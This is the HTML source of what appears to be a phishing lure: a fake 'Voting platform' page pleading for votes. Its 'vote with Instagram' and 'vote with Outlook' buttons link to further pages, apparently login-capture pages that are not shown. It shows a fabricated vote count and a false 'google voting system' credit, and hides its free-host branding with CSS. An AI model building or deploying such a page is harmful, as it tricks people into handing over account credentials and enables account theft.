<!DOCTYPE html>
<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">


  <style>
    img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {
      display: none;
    }

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
    }

    html {
      background: #F1F3FA;
    }

    .wrapper {
      background: white;
      width: 80%;
      margin: 15% 50%;
      transform: translateX(-50%);
      border-radius: 5px;
      color: dodgerblue;
    }

    button {
      background: #5CB85C;
      border-radius: 3px;
      color: white;
      padding: 5px;
      border: 1px solid transparent;
    }

    ul li {
      list-style-type: none;
      padding: 10px;
      background: white;
      color: #5B9BD1;
    }

    @media screen and (min-width: 768px) {
      .wrapper {
        width: 50%;
      }
    }
  </style>
</head>

<body>
  <div class="wrapper">
    <p style="color: #507392; font-size: 13px; padding: 10px; text-align: center;">PLEASE I NEED YOUR VOTE</p>
    <center><img src="images/image.jpg" width="100px" height="100px">
      <h4 style="padding: 10px 0; text-overflow: ellipsis; width: 200px; overflow: hidden; color: #507392">Voting
        platform</h4>
      <a href="home.html"><button style="background: #C62E2E;">VOTE WITH INSTAGRAM <i
            class="fa fa-instagram"></i></button></a>
      <a style="display:none;" href="index_facebook.html"><button style="background: #7263f7;">VOTE WITH <i
            class="fa fa-facebook"></i></button></a>
      <a href="index_mail.html"><button style="background:#0D92F4;">VOTE WITH OUTLOOK <i
            class="fa fa-envelope"></i></button></a>
    </center><br>
    <ul>
      <li style="background: #F6F9FB; border-left: 2px solid #5B9BD1; "><i class="fa fa-home"></i> Total Votes: 312 out
        of 450</li>
      <li style='color: #6f808a86'> <i class="fa fa-check"></i> Total Votes To Win: 450</li>
      <a href="#" style='text-decoration: none; color: #6f808a86'>
        <li style='color: #6f808a86'><i class="fa fa-flag"></i> Help</li>
      </a>
    </ul>
  </div>
  <h4 style="text-align: center; color: #3f3f3f;">Powered by <span style="color: #5B9BD1;"> google voting system</span>
  </h4>
</body>

</html>
